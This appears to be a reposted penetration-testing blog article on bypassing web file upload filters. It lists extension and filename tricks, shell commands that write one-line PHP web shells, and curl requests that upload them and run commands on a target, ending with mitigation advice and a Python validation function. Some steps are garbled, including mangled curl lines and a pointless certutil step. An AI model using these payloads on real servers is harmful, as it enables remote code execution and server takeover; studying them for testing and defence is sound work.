File Upload Bypass Techniques for Penetration Testing

File upload vulnerabilities are a common attack vector in web applications. Attackers exploit weak validation mechanisms to upload malicious files, leading to server compromise. Below are bypass techniques for both blacklisting and whitelisting approaches.

Blacklisting Bypass

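Blacklisting blocks specific file extensions, but the list is rarely complete, and whether a given extension is executed depends on how the server's handlers are configured. Alternative extensions and upload names that blacklists commonly miss: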
– PHP: `.php`, `.php2`, `.php3`, `.php4`, `.php5`, `.php6`, `.php7`, `.phps`, `.pht`, `.phtml`, `.pgif`, `.shtml`, `.htaccess`, `.phar`, `.inc`, `.hphp`, `.ctp`, `.module`
– ASP: `.asp`, `.aspx`, `.config`, `.ashx`, `.asmx`, `.aspq`, `.axd`, `.cshtml`, `.vbhtml`, `.asa`, `.cer`
– JSP: `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
– ColdFusion: `.cfm`, `.cfml`, `.cfc`, `.dbm`
– Perl: `.pl`, `.cgi`
– Random Capitalization: `.pHp`, `.pHP5`, `.PhAr`

Whitelisting Bypass

Whitelisting allows only specific extensions, but a check that parses the filename differently from the server or filesystem can still be bypassed with these tricks:
– Double Extensions: `file.png.php`, `file.png.Php5`
– Null Byte Injection: `file.php%00.png`, `file.php\x00.png`
– URL Encoding: `file.php%20`, `file.php%0a`
– Trailing Characters: `file.php.`, `file.php….`
– Path Manipulation: `file.php/`, `file.php.\`
– Fake Extensions: `file.php.png`, `file.phpJunk123png`

You Should Know:

Practical Exploitation Steps

1. Identify Upload Functionality

  • Use Burp Suite or browser dev tools to inspect file upload forms.

2. Test Blacklist Bypass

curl -F "[email protected]" http://target.com/upload

3. Test Whitelist Bypass

mv shell.php shell.png.php
python3 -c 'print("<?php system($_GET['cmd']); ?>")' > shell.php%00.png

4. Null Byte Exploitation (PHP)

echo '<?php system($_REQUEST["cmd"]); ?>' > exploit.php%00.jpg

5. Check for Server-Side Execution

curl http://target.com/uploads/exploit.php%00.jpg?cmd=id

6. Alternative Extensions (Windows)

ren shell.php shell.php.jpg
certutil -encode shell.php.jpg shell.php

7. Bypass Content-Type Check

curl -F "[email protected];type=image/png" http://target.com/upload

What Undercode Say

File upload vulnerabilities remain a critical security issue due to improper validation. Always:
– Use whitelisting over blacklisting.
– Implement file content verification (e.g., magic bytes).
– Store uploads in a non-executable directory.
– Apply server-side scanning for malicious files.
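
The first three recommendations above combined into one server-side check, as an added example that is not from the original post. The names `validate_upload`, `save_upload` and `ALLOWED`, and the image-only allowlist, are assumptions made for illustration; the filename is assumed to arrive after the framework's single decode.

```python
import os
import uuid

# Allowlisted extension -> leading magic bytes the content must start with.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, content: bytes) -> str:
    """Return a server-generated storage name, or raise ValueError."""
    # Path manipulation: a bare file name carries no separators.
    if "/" in filename or "\\" in filename:
        raise ValueError("path separator in filename")
    # Null byte and URL-encoding tricks: no control characters, no leftover '%'.
    if any(ord(c) < 0x20 or c == "%" for c in filename):
        raise ValueError("control or percent character in filename")
    # Double extensions and trailing dots: exactly one dot, both sides non-empty.
    stem, dot, ext = filename.partition(".")
    if not stem or not dot or not ext or "." in ext:
        raise ValueError("filename must be <name>.<ext> with a single dot")
    # Random capitalization: normalise case before the allowlist lookup.
    ext = ext.lower()
    if ext not in ALLOWED:
        raise ValueError("extension not allowlisted")
    # Content verification: leading bytes must match the claimed type.
    if not content.startswith(ALLOWED[ext]):
        raise ValueError("magic bytes do not match extension")
    # The stored name never reuses client input.
    return f"{uuid.uuid4().hex}.{ext}"


def save_upload(upload_dir: str, filename: str, content: bytes) -> str:
    """Validate, then write without execute bits; return the stored path.

    Assumption: upload_dir is outside the web root or served with script
    handlers disabled. Magic bytes cover only the file's prefix, so a
    polyglot can pass validation; the storage location is the backstop.
    """
    path = os.path.join(upload_dir, validate_upload(filename, content))
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return path
```
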

Expected Output:

A successful bypass leads to remote code execution (RCE):

curl http://target.com/uploads/shell.php?cmd=whoami

If defenses are weak, attackers gain full server control.

Prediction

As web apps adopt stricter upload filters, attackers will shift to polyglot files (e.g., PDFs with PHP) and API-based bypasses. AI-driven file analysis may become the next battleground.

Reported By: Shahidul Islam – Hackers Feeds